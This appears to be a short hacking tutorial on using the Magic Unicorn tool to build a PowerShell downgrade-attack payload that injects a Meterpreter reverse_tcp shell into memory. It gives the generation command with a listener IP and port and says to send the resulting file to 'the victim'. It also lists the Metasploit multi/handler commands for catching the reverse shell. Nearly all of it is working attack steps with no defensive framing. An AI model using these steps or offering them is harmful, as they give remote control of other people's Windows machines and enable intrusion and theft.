Magic Unicorn is a simple tool for using a PowerShell downgrade attack and injects shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
./unicorn.py windows/meterpreter/reverse_tcp 192.168.0.182 4444
It will create two files, powershell_attack.txt and unicorn.rc. Now send the powershell_attack.txtto the victim
Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.182
set lport 4444
exploit
Simply paste the powershell_attacks.txt command in any command prompt window and it will give a shell back to you
This will work on any version of Windows with PowerShell installed.
